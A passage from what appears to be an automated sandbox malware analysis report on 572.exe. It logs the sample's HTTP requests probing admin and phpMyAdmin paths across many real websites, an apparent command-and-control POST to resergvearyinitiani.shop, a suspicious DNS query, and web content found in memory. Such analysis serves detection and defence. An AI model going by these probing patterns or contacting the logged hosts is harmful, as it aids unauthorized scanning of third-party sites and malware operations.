                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: th-th.facebook.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /admin.php HTTP/1.1Host: loopex.ioAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /admin.php HTTP/1.1Host: genshin.mihoyo.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /admin.php HTTP/1.1Host: store.steampowered.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /admin HTTP/1.1Host: accounts.google.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /admin HTTP/1.1Host: connect.appen.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /admin.php HTTP/1.1Host: midetuvelocidad.claro.com.peAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: warriorplus.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: ro.bongacams.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: multiideas.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: tiktok.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: 3fba-180-252-166-236.ngrok.ioAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: accounts.binance.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: us04web.zoom.usAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: opsu.terna.netAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: followerstiktok.xyzAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: zarkana2.roAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: foros.netAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: cjdropshipping.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: multiideas.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: lookaside.fbsbx.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: nuevopacto.runacode.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: zuhauseplus.vodafone.deAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: idp.uitgeverij-deviant.nlAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: servicossociais.caixa.gov.brAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /admin.php HTTP/1.1Host: steamcommunity.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /admin.php HTTP/1.1Host: hartico.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /admin HTTP/1.1Host: aeaaamorim.inovarmais.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: discord.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: virtuadopt.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: ucv.blackboard.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /wp-admin/ HTTP/1.1Host: signin.rockstargames.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1Host: csefujt.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: easygold.joyalukkas.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: xn--72c1aelbgm0bc7d2cb0etac4cc5mdm2mra.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: foros.netAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://foros.net/administrator/
                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: 3fba-180-252-166-236.ngrok.ioAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: yellosa.co.zaAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: multiideas.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://multiideas.com/administrator/
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: mega.nzAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: nossoplayer.meAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://nossoplayer.me/administrator/
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: mitextoescolar.mineduc.clAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /wp-admin/ HTTP/1.1Host: ventas.officeinsumos.com.arAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: mobilsam.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: mw.redsa.netAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: login2.innova.puglia.itAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /wp-admin/ HTTP/1.1Host: innovationdevelopment.euAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: oferta.senasofiaplus.edu.coAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /wp-login.php HTTP/1.1Host: hero-wars.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: accounts.snapchat.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: 572.exe, 00000009.00000003.4084235981.0000000040855000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: <a href="https://www.facebook.com/Zarkana2" target="_blank" title="Facebook"><img src="images/facebook.png" width="32" height="32" /></a> equals www.facebook.com (Facebook)
                Source: 572.exe, 00000009.00000003.4084235981.0000000040855000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: <a href="https://www.youtube.com/@Zarkana2?sub_confirmation=1" target="_blank" title="YouTube"><img src="images/youtube.png" width="32" height="32" /></a> equals www.youtube.com (Youtube)
                Source: 572.exe, 00000009.00000003.4070644791.0000000064059000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: &nbsp; | &nbsp;<a href="https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.facebook.com%2FSteam" target="_blank" rel=" noopener"><img src="https://store.cloudflare.steamstatic.com/public/images/ico/ico_facebook.png" alt="Facebook"> Steam</a> equals www.facebook.com (Facebook)
                Source: 572.exe, 00000009.00000003.4304769446.0000000040257000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: <a id="help" href="//www.facebook.com/help/">Help Center</a> equals www.facebook.com (Facebook)
                Source: 572.exe, 00000009.00000003.4304769446.0000000040257000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: <a id="back" href="//www.facebook.com/">Go Back</a> equals www.facebook.com (Facebook)
                Source: 572.exe, 00000009.00000003.4299205287.000000004061B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: src="https://www.facebook.com/tr?id=596118847837331&ev=PageView&noscript=1" equals www.facebook.com (Facebook)
                Source: 572.exe, 00000009.00000003.4304769446.0000000040257000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: <a href="//www.facebook.com/"> equals www.facebook.com (Facebook)
                Source: 572.exe, 00000009.00000003.4299205287.000000004061B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: <link rel="preconnect" href="https://www.facebook.com"> equals www.facebook.com (Facebook)
                Source: 572.exe, 00000009.00000003.4184636529.0000000047AC3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: <LI><A class="link_facebook" title="Facebook" href="https://www.facebook.com/caixa">Facebook</A> </LI> equals www.facebook.com (Facebook)
                Source: 572.exe, 00000009.00000003.4184636529.0000000047AC3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: <LI><A class="link_youtube" title="YouTube" href="https://www.youtube.com/canalcaixa">YouTube</A> </LI></UL></DIV> equals www.youtube.com (Youtube)
                Source: 572.exe, 00000009.00000003.4373730161.0000000063DEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: <a href="https://www.facebook.com/wrplus" target="_blank"><i class="fa fa-facebook"></i></a> equals www.facebook.com (Facebook)
                Source: 572.exe, 00000009.00000003.4040528090.000000004047D000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4298111023.0000000040716000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: <a href="https://www.facebook.com/zoom" class="icon" target="_blank"> equals www.facebook.com (Facebook)
                Source: 572.exe, 00000009.00000003.4040528090.000000004047D000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4298111023.0000000040716000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: <a href="https://www.linkedin.com/company/zoom-video-communications/" class="icon" target="_blank"> equals www.linkedin.com (Linkedin)
                Source: 572.exe, 00000009.00000003.4373730161.0000000063DEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: <a href="https://www.youtube.com/warriorplusvideo" target="_blank"><i class="fa fa-youtube"></i></a> equals www.youtube.com (Youtube)
                Source: 572.exe, 00000009.00000003.4040528090.000000004047D000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4298111023.0000000040716000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: <a href="https://www.youtube.com/zoommeetings" class="icon" target="_blank"> equals www.youtube.com (Youtube)
                Source: 572.exe, 00000009.00000003.4373730161.0000000063E5F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: <div class="blockLink"><i class="fas fa-caret-right"></i><a class=" " href="https://www.facebook.com/groups/242772140713946">PatronHub facebook group</a></div> equals www.facebook.com (Facebook)
                Source: 572.exe, 00000009.00000003.4373730161.0000000063DEC000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4572467958.000000000595D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: <div class="fb-like overflow-hidden w-100" data-href="https://www.facebook.com/wrplus" data-width="240" data-layout="standard" data-action="like" data-size="small" data-show-faces="true" data-share="false" data-colorscheme="dark"></div> equals www.facebook.com (Facebook)
                Source: 572.exe, 00000009.00000003.4304769446.0000000040398000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: font-src data: *.gstatic.com *.facebook.com *.fbcdn.net *.fbsbx.com;img-src *.fbcdn.net *.facebook.com data: https://*.fbsbx.com facebook.com *.cdninstagram.com fbsbx.com fbcdn.net connect.facebook.net *.carriersignal.info blob: android-webview-video-poster: googleads.g.doubleclick.net www.googleadservices.com *.whatsapp.net *.fb.com *.oculuscdn.com *.tenor.co media.tenor.com *.tenor.com *.giphy.com;media-src *.cdninstagram.com blob: *.fbcdn.net *.fbsbx.com www.facebook.com *.facebook.com data: https://*.giphy.com;frame-src *.doubleclick.net *.google.com *.facebook.com www.googleadservices.com *.fbsbx.com fbsbx.com data: www.instagram.com *.fbcdn.net https://paywithmybank.com/ https://sandbox.paywithmybank.com/;worker-src blob: *.facebook.com data:; equals www.facebook.com (Facebook)
                Source: 572.exe, 00000009.00000003.4299205287.000000004061B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: nline' 'unsafe-eval' https://store.cloudflare.steamstatic.com/ https://store.cloudflare.steamstatic.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' http://store.steampowered.com https://store.steampowered.com http://127.0.0.1:27060 ws://127.0.0.1:27060 https://community.cloudflare.steamstatic.com/ https://steamcommunity.com/ https://steamcommunity.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://shared.cloudflare.steamstatic.com/ https://checkout.steampowered.com/; frame-src 'self' steam: http://www.youtube.com https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://steamcommunity.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'none'; equals www.youtube.com (Youtube)
                Source: 572.exe, 00000009.00000003.4028547496.0000000047B3A000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.3991523314.0000000040415000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.3908338136.000000006417B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: src="https://www.facebook.com/tr?id=708505188065970&ev=PageView&noscript=1" equals www.facebook.com (Facebook)
                Source: 572.exe, 00000009.00000003.4307098588.0000000006245000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: x.com *.fb.com;font-src data: *.gstatic.com *.facebook.com *.fbcdn.net *.fbsbx.com;img-src *.fbcdn.net *.facebook.com data: https://*.fbsbx.com facebook.com *.cdninstagram.com fbsbx.com fbcdn.net connect.facebook.net *.carriersignal.info blob: android-webview-video-poster: googleads.g.doubleclick.net www.googleadservices.com *.whatsapp.net *.fb.com *.oculuscdn.com *.tenor.co media.tenor.com *.tenor.com *.giphy.com;media-src *.cdninstagram.com blob: *.fbcdn.net *.fbsbx.com www.facebook.com *.facebook.com data: https://*.giphy.com;frame-src *.doubleclick.net *.google.com *.facebook.com www.googleadservices.com *.fbsbx.com fbsbx.com data: www.instagram.com *.fbcdn.net https://paywithmybank.com/ https://sandbox.paywithmybank.com/;worker-src blob: *.facebook.com data:; equals www.facebook.com (Facebook)
                Source: unknownDNS traffic detected: queries for: selebration17io.io
                Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: resergvearyinitiani.shop
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: AkamaiGHostMime-Version: 1.0Content-Type: text/htmlContent-Length: 274Expires: Mon, 05 Feb 2024 11:14:49 GMTDate: Mon, 05 Feb 2024 11:14:49 GMTConnection: closeServer-Timing: cdn-cache; desc=HITServer-Timing: edge; dur=1Strict-Transport-Security: max-age=31536000 ; includeSubDomains ; preloadServer-Timing: ak_p; desc="1707131689623_1611129006_213759291_16_9738_101_131_-";dur=1
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 05 Feb 2024 11:14:49 GMTContent-Type: text/html; charset=UTF-8Content-Length: 12534Connection: closeAccept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACross-Origin-Embedder-Policy: require-corpCross-Origin-Opener-Policy: same-originCross-Origin-Resource-Policy: same-originOrigin-Agent-Cluster: ?1Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()Referrer-Policy: same-originX-Frame-Options: SAMEORIGINcf-mitigated: challengeCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=4pInUVDMPwjd%2B201XYHDzYYi8Tdks5fV9N%2FYQ3W3PDnzE5gG8o0NgacAJzguzU1uFkEX%2BhbjNaSM%2FrcWmNbHwwX%2BswVPV5CbMqbqLdWGp6wHkqilKNTfBC8%3D"}],"group":"cf-nel","max_age":604800}
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 05 Feb 2024 11:14:49 GMTContent-Type: text/html; charset=UTF-8Content-Length: 4514Connection: closeX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: max-age=15Expires: Mon, 05 Feb 2024 11:15:04 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=VC%2FCmjkta3%2FR%2BVtG8JGdrb%2F7C3IbRBhADPvrpEmV2noPvQOVP%2Fb3lzKhA87FHBG%2Fb6uEoQGS51jpwGhWzqRoL0G6wIKV1N39LPuLmyBe07PF%2F2PDfOGztGECds8qsyd78HJ1ZSxTUdlx"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 850abb66191453fe-ATL
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closeContent-Type: text/htmlNgrok-Error-Code: ERR_NGROK_3200Ngrok-Trace-Id: 4bf33280bf5f3bd0836cbba6add9d4d1Referrer-Policy: no-referrerDate: Mon, 05 Feb 2024 11:14:51 GMTTransfer-Encoding: chunked
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 05 Feb 2024 11:14:51 GMTServer: Apache/2.4.41 (Ubuntu)Expires: 0Cache-Control: no-cache, no-store, max-age=0, must-revalidateX-Powered-By: JSP/2.2Set-Cookie: JSESSIONID=A0iUBDz0ojlIC0qq9RPBz7uw.cmrsanmartin; path=/X-XSS-Protection: 1; mode=blockPragma: no-cacheX-Frame-Options: SAMEORIGINX-Robots-Tag: noindex,noarchiveX-Content-Type-Options: nosniffStrict-Transport-Security: max-age=31536000 ; includeSubDomainsContent-Type: text/html;charset=UTF-8Content-Language: es-CLConnection: closeTransfer-Encoding: chunked
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 05 Feb 2024 11:14:51 GMTContent-Type: text/html;charset=utf-8Transfer-Encoding: chunkedConnection: closex-zm-trackingid: v=2.0;clid=us04;rid=WEB_3bf5fc9c9ff16db8b8a5fcc02f1fb359x-content-type-options: nosniffcontent-security-policy: upgrade-insecure-requests; default-src https://*.zoom.us https://zoom.us blob: 'self'; img-src https: about: blob: data: 'self'; style-src https: safari-extension: chrome-extension: 'unsafe-inline' data: 'self'; font-src https: safari-extension: chrome-extension: blob: data: 'self'; connect-src * about: blob: data: 'self'; media-src * rtmp: blob: data: 'self'; frame-src https: ms-appx-web: zoommtg: zoomus: wvjbscheme: zoomprc: data: blob: 'self'; object-src 'none'; base-uri 'none';script-src 'self' 'strict-dynamic' 'nonce-xGfoX8U0T-qMtRIqaVnNiQ' 'unsafe-inline' blob: https:;x-frame-options: SAMEORIGINset-cookie: zm_aid=; Max-Age=0; Expires=Thu, 01 Jan 1970 00:00:10 GMT; Domain=zoom.us; Path=/; Secure; HttpOnlyx-zm-zoneid: VA2content-language: en-USCF-Cache-Status: DYNAMICSet-Cookie: zm_haid=; Max-Age=0; Expires=Thu, 01 Jan 1970 00:00:10 GMT; Domain=zoom.us; Path=/; Secure; HttpOnlySet-Cookie: zm_tmaid=; Max-Age=0; Expires=Thu, 01 Jan 1970 00:00:10 GMT; Domain=zoom.us; Path=/; Secure; HttpOnly
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundcontent-type: text/html;charset=utf-8vary: Accept-Encodingset-cookie: sc-wcid=a144e177-09e4-4e33-ab14-8346afc4f347; Path=/; Domain=.snapchat.com; Expires=Tue, 06-Feb-2024 11:14:51 GMT; Max-Age=86400; Secureexpires: Thu, 01 Jan 1970 00:00:00 GMTstrict-transport-security: max-age=31536000; includeSubdomainsx-xss-protection: 1; mode=blockx-content-type-options: nosniffx-frame-options: allow-from https://iframe.arkoselabs.comcache-control: no-cache, no-store, max-age=0content-security-policy: default-src 'self'; script-src 'self' 'sha256-93ejg12EAT+6aW5hUFXASC0su+RZ+zOjgnJgLqJaLmY=' https://sc-static.net https://www.google-analytics.com https://www.googletagmanager.com https://snap-api.arkoselabs.com/ https://www.google.com/recaptcha/ https://www.google.com/js https://www.gstatic.com/ https://apis.google.com/ https://tr.snapchat.com/config/com/49966cac-c23c-49c7-9ff9-c7f8f6f771ba.js; font-src 'self' https://snapnet-cdn.storage.googleapis.com *.sc-cdn.net data:; style-src 'self' 'unsafe-inline' https://snapnet-cdn.storage.googleapis.com *.sc-cdn.net blob:; frame-src 'self' https://iframe.arkoselabs.com https://snap-api.arkoselabs.com https://tr.snapchat.com https://www.google.com/ https://client-api.arkoselabs.com/; connect-src 'self' https://graphql.contentful.com/content/v1/spaces/kp51zybwznx4/environments/master https://snap-api.arkoselabs.com/ https://tr.snapchat.com https://www.snapchat.com https://accounts.snapchat.com https://web-frontend-dot-sc-analytics.appspot.com https://us-central1-gcp.api.snapchat.com https://staging-us-central1-gcp.api.snapchat.com https://www.google-analytics.com https://sentry.sc-prod.net https://cdn.contentful.com/spaces/kp51zybwznx4/ https://accounts.snap.com/ https://web.snapchat.com/ https://gcp.api.snapchat.com https://story.snapchat.com https://aws.api.snapchat.com/snapchat.cdp.cof.CircumstancesService/targetingQuery https://aws.api.snapchat.com/snapchat.ab.exposure_service.ExposureService/BatchUpdateAbExposure https://chat-gold.sc-corp.net; img-src 'self' data: https://ssl.gstatic.com https://www.snapchat.com https://sc-oauth2-client-icons-dev.storage.googleapis.com https://sc-oauth2-client-icons.storage.googleapis.com https://storage.googleapis.com https://www.google-analytics.com https://images.ctfassets.net https://sdk.bitmoji.com; media-src 'self' https://storage.googleapis.com; form-action 'self' https://*.snap.com https://*.snapchat.com https://*.snap-dev.net https://*.sc-corp.net https://localhost:3000; frame-ancestors https://iframe.arkoselabs.com https://profile.softserve-local-prod.snap-dev.net https://preproduction-dot-snap-profile-manager.snapchat.com https://hotfix-dot-snap-profile-manager.snapchat.com https://snap-profile-manager.snapchat.com https://profile-preprod.snapchat.com https://business-preprod.snapchat.com https://profile.snapchat.com https://business.snapchat.com https://enterprise.snap.com;x-content-security-policy: default-src 'self'; script-
